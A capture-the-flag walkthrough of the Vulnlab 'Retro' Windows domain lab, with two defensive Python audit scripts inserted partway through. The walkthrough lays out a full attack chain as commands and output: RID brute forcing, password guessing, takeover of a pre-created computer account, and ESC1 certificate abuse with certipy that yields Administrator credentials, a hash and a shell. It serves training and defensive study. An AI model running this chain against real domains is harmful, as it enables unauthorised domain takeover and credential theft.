Vulnlab Retro Walkthrough by Yunolay (RID Brute Force, pre-created computer accounts, ADCS Attacks)

Overview

  • Retro (Solo, Windows)
    • Junior Level Windows Active Directory Machine
    • You will learn about pre-created computer accounts & ADCS

Root

Look into pre-created computer accounts (https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
Enumerate certificate templates

Nmap Scan

I first scanned it normally with nmap. But it was protected by tcpwrapped.

$ nmap -sC -sV -p- -Pn --min-rate 5000 10.10.109.6
...
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2023-07-25T09:53:42
|_Not valid after: 2024-01-24T09:53:42
|_ssl-date: 2023-11-01T10:25:42+00:00; -1s from scanner time.
49673/tcp open tcpwrapped
49715/tcp open unknown

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-01T10:25:09
|_ start_date: N/A
...

I tried an nmap tcpwrapped bypass scan. It worked, and the services appeared.

I was able to get results that I was satisfied with.

$ nmap -n -vv -A --min-parallelism=50 --max-parallelism=150 --min-rate 5000 -Pn -T2 10.10.109.6
...
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-11-01 10:40:59Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0:bac7:16e0:71c2:bcb9:4327:3d56:9612
| SHA-1: 7f37:ea69:6598:2430:f918:0a65:bcad:de76:add6:fea6
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-11-01T10:41:44+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after: 2024-01-24T09:53:42
| MD5: 89cc:bcee:0485:b170:bbd1:ebee:3de9:3784
| SHA-1: 2bfc:a683:288b:c59e:2d2f:9ffe:0177:5d87:1c8c:272d
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
|_ssl-date: 2023-11-01T10:42:23+00:00; 0s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 2508/tcp): CLEAN (Timeout)
| Check 2 (port 55949/tcp): CLEAN (Timeout)
| Check 3 (port 26193/udp): CLEAN (Timeout)
| Check 4 (port 63552/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2023-11-01T10:41:46
|_ start_date: N/A

SMB – No Password

Anyway, I looked at the SMB shares first.

$ smbclient -L 10.10.109.6
Password for [WORKGROUP\kali]:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Notes           Disk      
SYSVOL          Disk      Logon server share 
Trainees        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.109.6 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The Trainees share was readable without credentials.

$ smbclient //10.10.109.6/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 23 17:58:43 2023
  ..                                DHS        0  Wed Jul 26 05:54:14 2023
  Important.txt                       A      288  Sun Jul 23 18:00:13 2023


6261499 blocks of size 4096. 2851529 blocks available
smb: \> get Important.txt 
getting file \Important.txt of size 288 as Important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>

Important.txt contains something very interesting. I honestly laughed when I saw the message “Please. We have other stuff to do than resetting your password every day.”

I thought they changed their password every day to a strong one.

$ cat Important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

SMB – RID Brute Force

I can assume that the Admins are struggling with strong passwords and have assigned everyone one account and set a simple password.

I used crackmapexec to brute force the RIDs.

$ crackmapexec smb 10.10.109.6 -u "user" -p "" --rid-brute
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\user:
SMB 10.10.109.6 445 DC [+] Brute forcing RIDs
SMB 10.10.109.6 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.10.109.6 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.10.109.6 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.10.109.6 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.10.109.6 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.10.109.6 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.10.109.6 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.10.109.6 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.109.6 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.109.6 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.10.109.6 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.109.6 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.109.6 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.6 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.6 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.10.109.6 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.10.109.6 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.109.6 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.109.6 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.109.6 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.109.6 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.109.6 445 DC 1109: RETRO\tblack (SidTypeUser)

Among these, the following names are likely to be useful as usernames. Save them as user.txt.

$ cat user.txt
trainee
BANKING$
jburley
HelpDesk
tblack

It is likely that the Admins set a simple password for one of the above users. The first simple password to think of is one where the username and password are the same.

Failing that, we should try rockyou.txt or a SecLists password list.

$ crackmapexec smb 10.10.109.6 -u user.txt -p user.txt
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\trainee:trainee

Turns out that the user “trainee” uses a simple password, and the username and password are the same.

I looked around to see if there was anything I could view using these credentials.

$ crackmapexec smb 10.10.109.6 -u "trainee" -p "trainee" --shares
SMB 10.10.109.6 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.6 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.109.6 445 DC [+] Enumerated shares
SMB 10.10.109.6 445 DC Share Permissions Remark
SMB 10.10.109.6 445 DC ----- ----------- ------
SMB 10.10.109.6 445 DC ADMIN$ Remote Admin
SMB 10.10.109.6 445 DC C$ Default share
SMB 10.10.109.6 445 DC IPC$ READ Remote IPC
SMB 10.10.109.6 445 DC NETLOGON READ Logon server share
SMB 10.10.109.6 445 DC Notes READ
SMB 10.10.109.6 445 DC SYSVOL READ Logon server share
SMB 10.10.109.6 445 DC Trainees READ

I found the SMB share “Notes” interesting.

$ smbclient //10.10.109.6/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 23 18:03:16 2023
  ..                                DHS        0  Wed Jul 26 05:54:14 2023
  ToDo.txt                            A      248  Sun Jul 23 18:05:56 2023


6261499 blocks of size 4096. 2849597 blocks available
smb: \> get ToDo.txt 
getting file \ToDo.txt of size 248 as ToDo.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

ToDo.txt talks about a pre-created computer account.

$ cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

As a tip, we were given a blog post about abusing pre-created computer accounts.

I worked a lot with OS deployment and automation. One thing you start to learn when you do a lot of setups with Remote Installation Services or Windows Deployment Services is that when you pre-create computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account DavesLaptop$ would have the password daveslaptop.

In other words, an account created as a pre-created computer account is likely to have the computer name in lowercase letters as its password, such as “daveslaptop” for “DavesLaptop$”, and it stays that way.

Of the accounts listed above, the one that looks like a pre-created computer account is “BANKING$”.

$ crackmapexec smb 10.10.124.179 -u "BANKING\$" -p "banking"
SMB 10.10.124.179 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.124.179 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

How do we test to find a valid password? When I did this on the engagement, I simply used Impacket’s smbclient.py script to authenticate to a target computer account. You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. The same error can also be seen with other tools such as CrackMapExec.

If this blog post is correct, I had guessed the correct password for a computer account that was not yet in use.

I didn’t read the article carefully, so first I tried to change the password remotely using smbpasswd. It failed.

$ smbpasswd -r 10.10.124.179 -U "BANKING\$"
Old SMB password:
New SMB password:
Retype new SMB password:
Could not connect to machine 10.10.124.179: NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

When I read the article carefully, it said that the password cannot be changed from SMB.

You cannot change the password over SMB (based on my research). This is due to the fact that you need to authenticate to the IPC$ share, and our identified computer account cannot be a pre-created computer account that has not had its password changed.

A solution was also provided in detail.

When I was looking in to this on my engagement, I was not aware of the Kpasswd method, so I instead ended up writing a custom Impacket script (rpcchangepwd.py) that leverages MS-RPC (port 135+high dynamic port) to change the password. This bypasses the error you get when doing it over SMB. The code is based on the smbpasswd and other Impacket scripts. I have created a pull request that can be found here for now. Hopefully it will be included in the main repo at some point.

When I looked at the pull request mentioned, it seemed that it had been added to changepasswd.py.

$ impacket-changepasswd "retro.vl/BANKING\$":banking@10.10.124.179 -newpass Password1 -dc-ip 10.10.124.179 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

When I submitted a password change request using the article and the help of impacket-changepasswd, it was displayed as successful.
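From the defender's side, the unused pre-created computer account described above can be found in a directory export before anyone else finds it. The following is an added example, not code from the original post or from the referenced blog: it assumes records already exported from AD with the attributes shown, and it treats userAccountControl 4128 (WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD) together with logonCount 0 as the signal for a pre-Windows 2000 style account. The dates and the WS01$ account are constructed.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bits (documented AD flag values)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
MAX_MACHINE_PW_AGE = timedelta(days=30)  # default machine password rotation interval


def utc(*args):
    return datetime(*args, tzinfo=timezone.utc)


def from_filetime(ft):
    """pwdLastSet is a FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def to_filetime(dt):
    """Helper used only to build the constructed sample below."""
    return int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000


# Constructed directory export (not real lab data). The names BANKING$, DC$ and
# trainee appear on the page; WS01$ and every date here are hypothetical.
RECORDS = [
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128, "logonCount": 0,
     "whenCreated": utc(2015, 3, 2, 9, 0),
     "pwdLastSet": to_filetime(utc(2015, 3, 2, 9, 0))},
    {"sAMAccountName": "WS01$", "userAccountControl": 4096, "logonCount": 412,
     "whenCreated": utc(2022, 1, 10, 8, 0),
     "pwdLastSet": to_filetime(utc(2023, 10, 20, 3, 0))},
    {"sAMAccountName": "DC$", "userAccountControl": 532480, "logonCount": 900,
     "whenCreated": utc(2023, 7, 23, 21, 0),
     "pwdLastSet": to_filetime(utc(2023, 10, 25, 2, 0))},
    {"sAMAccountName": "trainee", "userAccountControl": 512, "logonCount": 57,
     "whenCreated": utc(2023, 7, 23, 21, 30),
     "pwdLastSet": to_filetime(utc(2023, 7, 23, 21, 30))},
]


def audit(records, now):
    """Return {account: [reasons]} for enabled workstation accounts that were
    created but never used, so their creation-time password is still valid."""
    findings = {}
    for r in records:
        uac = r["userAccountControl"]
        if not uac & WORKSTATION_TRUST_ACCOUNT or uac & ACCOUNTDISABLE:
            continue  # only enabled workstation trust accounts are in scope
        pw_set = from_filetime(r["pwdLastSet"])
        reasons = []
        if uac & PASSWD_NOTREQD:
            reasons.append("PASSWD_NOTREQD")
        if r["logonCount"] == 0:
            reasons.append("never-logged-on")
        if abs(pw_set - r["whenCreated"]) < timedelta(minutes=5):
            reasons.append("password-unchanged-since-creation")
        if now - pw_set > MAX_MACHINE_PW_AGE:
            reasons.append("password-older-than-rotation-interval")
        if "never-logged-on" in reasons and "password-unchanged-since-creation" in reasons:
            findings[r["sAMAccountName"]] = reasons
    return findings


if __name__ == "__main__":
    for name, why in audit(RECORDS, utc(2023, 11, 1)).items():
        print(f"{name}: {', '.join(why)}")
```

Accounts this flags should be deleted, disabled, or have their password reset to a random value, which is the cleanup the ToDo.txt note was asking for.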

ADCS Attacks

The next thing we can do is check to see if retro.vl is using Active Directory Certificate Services. It is convenient to use certipy.

First, I started by listing the basic templates listed on the vulnlab wiki.

$ certipy find -u "BANKING$"@retro.vl -p Password1 -dc-ip 10.10.66.83 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.66.83:636 - ssl
[+] Default path: DC=retro,DC=vl
[+] Configuration path: CN=Configuration,DC=retro,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.retro.vl' at '10.10.66.83'
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.66.83
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[+] Connected to remote registry at 'DC.retro.vl' (10.10.66.83)
[*] Got CA configuration for 'retro-DC-CA'
[+] Resolved 'DC.retro.vl' from cache: 10.10.66.83
[+] Connecting to 10.10.66.83:80
[*] Saved BloodHound data to '20231102094259_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20231102094259_Certipy.txt'
[*] Saved JSON output to '20231102094259_Certipy.json'

While looking at the results, I found a vulnerable template that could be used for privilege escalation within the domain.

I focused my search on vulnerable templates.

$ certipy find -vulnerable -u "BANKING$"@retro.vl -p Password1 -dc-ip 10.10.66.83 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.66.83:636 - ssl
[+] Default path: DC=retro,DC=vl
[+] Configuration path: CN=Configuration,DC=retro,DC=vl
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
RETRO.VL\Domain Computers (S-1-5-21-2983547755-698260136-4283918172-515)
RETRO.VL\Users (RETRO.VL-S-1-5-32-545)
RETRO.VL\Everyone (RETRO.VL-S-1-1-0)
RETRO.VL\Authenticated Users (RETRO.VL-S-1-5-11)
RETRO.VL\banking (S-1-5-21-2983547755-698260136-4283918172-1106)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.retro.vl' at '10.10.66.83'
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.66.83
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'DC.retro.vl' (10.10.66.83)
[*] Got CA configuration for 'retro-DC-CA'
[+] Resolved 'DC.retro.vl' from cache: 10.10.66.83
[+] Connecting to 10.10.66.83:80
[*] Saved BloodHound data to '20231102112955_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20231102112955_Certipy.txt'
[*] Saved JSON output to '20231102112955_Certipy.json'

I found out that RetroClients is vulnerable to ESC1, along with information such as the Template Name and Certificate Authorities.

$ cat 20231102112955_Certipy.txt
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
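The ESC1 finding above is a conjunction of several template settings, and changing any one of them removes it. The following is an added example, not part of the original post and not Certipy's own code: it evaluates each precondition for the RetroClients template and shows the effect of each single hardening change. The dictionary is constructed from the field names and values in the output above; its layout and the list of low-privileged groups are assumptions.

```python
import copy

# Constructed sample: field names and values mirror the Certipy text output
# above; the dict layout is an assumption made for this example.
RETRO_CLIENTS = {
    "Template Name": "RetroClients",
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Permissions": {
        "Enrollment Permissions": {
            "Enrollment Rights": [
                "RETRO.VL\\Domain Admins",
                "RETRO.VL\\Domain Computers",
                "RETRO.VL\\Enterprise Admins",
            ]
        }
    },
}

# Groups that ordinary user or machine accounts belong to (assumption, tune per domain).
LOW_PRIV_GROUPS = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone", "Users"}


def low_priv_enrollers(template):
    rights = template["Permissions"]["Enrollment Permissions"]["Enrollment Rights"]
    return sorted(p for p in rights if p.rsplit("\\", 1)[-1] in LOW_PRIV_GROUPS)


def esc1_checks(template):
    """Evaluate each ESC1 precondition separately so the report says why."""
    return {
        "enabled": template["Enabled"],
        "enrollee_supplies_subject": template["Enrollee Supplies Subject"],
        "authentication_eku": template["Client Authentication"] or template["Any Purpose"],
        "no_manager_approval": not template["Requires Manager Approval"],
        "no_authorized_signatures": template["Authorized Signatures Required"] == 0,
        "low_priv_can_enroll": bool(low_priv_enrollers(template)),
    }


def is_esc1(template):
    return all(esc1_checks(template).values())


def single_fixes(template):
    """Apply one hardening change at a time to a copy; report if ESC1 still holds."""
    def still_esc1_after(mutate):
        t = copy.deepcopy(template)
        mutate(t)
        return is_esc1(t)

    def drop_low_priv(t):
        perms = t["Permissions"]["Enrollment Permissions"]
        keep = set(perms["Enrollment Rights"]) - set(low_priv_enrollers(t))
        perms["Enrollment Rights"] = sorted(keep)

    return {
        "build subject from AD instead of the request":
            still_esc1_after(lambda t: t.update({"Enrollee Supplies Subject": False})),
        "require CA manager approval":
            still_esc1_after(lambda t: t.update({"Requires Manager Approval": True})),
        "remove low-privileged enrollment rights":
            still_esc1_after(drop_low_priv),
    }


if __name__ == "__main__":
    for name, ok in esc1_checks(RETRO_CLIENTS).items():
        print(f"{name:28} {ok}")
    print("ESC1:", is_esc1(RETRO_CLIENTS), "via", low_priv_enrollers(RETRO_CLIENTS))
    for fix, still in single_fixes(RETRO_CLIENTS).items():
        print(f"after '{fix}': still ESC1 = {still}")
```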

ESC1 – Use ability to enroll as a normal user & provide a user defined subject alternative name

For now, I tried requesting it according to the template written in the vulnlab wiki and Certipy’s README.md.

$ certipy req -username "BANKING\$"@retro.vl -p Password1 -target dc.retro.vl -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.10.81.117 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.retro.vl' at '10.10.81.117'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N) y
[*] Saved private key to 8.key
[-] Failed to request certificate

The above command saves the private key, but the request fails with an error about the minimum key size: the RetroClients template has a Minimum RSA Key Length of 4096. To solve this problem, just add “-key-size 4096” to the options.

$ certipy req -username "BANKING\$"@retro.vl -password Password1 -target dc.retro.vl -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.10.81.117 -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.retro.vl' at '10.10.81.117'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.81.117[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

I was able to save the Administrator’s ticket and get the NT hash as well.

$ certipy auth -pfx administrator.pfx -dc-ip 10.10.81.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

The following cheat sheet describes how to create a shell using impacket by exploiting tickets.

I couldn’t tell the difference between “impacket-psexec”, “impacket-smbexec” and “impacket-wmiexec”, so I tried them all. As a result, I was able to get a shell by using “impacket-wmiexec”.

As a result, I got the Administrator shell and got the root flag.

$ export KRB5CCNAME=administrator.ccache

$ impacket-wmiexec retro.vl/Administrator@dc.retro.vl -k -no-pass -dc-ip 10.10.81.117
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro\administrator

C:\>type C:\Users\Administrator\Desktop\root.txt
VL{<REDACTED>}

Thoughts

ADCS attacks are the basic of basics, but it took me a long time to solve it because I didn’t have enough knowledge. I wanted to learn this kind of basic privilege escalation as a foundation.

I encountered a similar problem a few weeks ago, but I was only solving the problem, not learning. I will reflect.
